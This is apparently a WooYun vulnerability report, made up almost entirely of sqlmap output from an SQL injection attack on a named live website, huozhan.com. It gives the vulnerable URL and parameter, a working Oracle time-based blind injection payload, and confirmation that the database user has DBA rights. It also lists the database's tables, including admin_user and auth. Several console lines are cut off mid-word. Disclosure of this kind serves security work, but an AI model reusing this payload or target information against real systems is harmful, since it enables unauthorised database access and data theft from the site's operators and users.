WooYun.org

http://www.huozhan.com/SupplierItemCate_searchProductList.do?SUPPLIER_CODE=010375&AREA_CODE=010BJ

Place: GET
Parameter: AREA_CODE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: SUPPLIER_CODE=010375&AREA_CODE=010BJ' AND 2609=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(112)||CHR(112)||CHR(87)||CHR(84),5) AND 'uZrB'='uZrB
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: SUPPLIER_CODE, type: Single quoted string (default)
[1] place: GET, parameter: AREA_CODE, type: Single quoted string
[q] Quit
>
[11:16:40] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[11:16:40] [INFO] fetching current user
[11:16:40] [INFO] retrieved:
[11:16:40] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[11:16:56] [INFO] adjusting time delay to 4 seconds due to good response times
HUOZHAN
current user:    'HUOZHAN'

web application technology: Nginx, JSP
back-end DBMS: Oracle
[11:22:08] [INFO] testing if current user is DBA
[11:22:08] [WARNING] time-based comparison needs larger st
g a few dummy requests, please wait..
[11:22:20] [WARNING] it is very important not to stress th
ndwidth during usage of time-based queries
1
current user is DBA:    'True'

Current database
[12 tables]
+---------------------+
| ALL_USERS           |
| TABLE_PRIVILEGE_MAP |
| admin_user          |
| article             |
| auth                |
| city                |
| dictionary          |
| inventory           |
| store               |
| supplier            |
| user_types          |
| zl_deeds            |
+---------------------+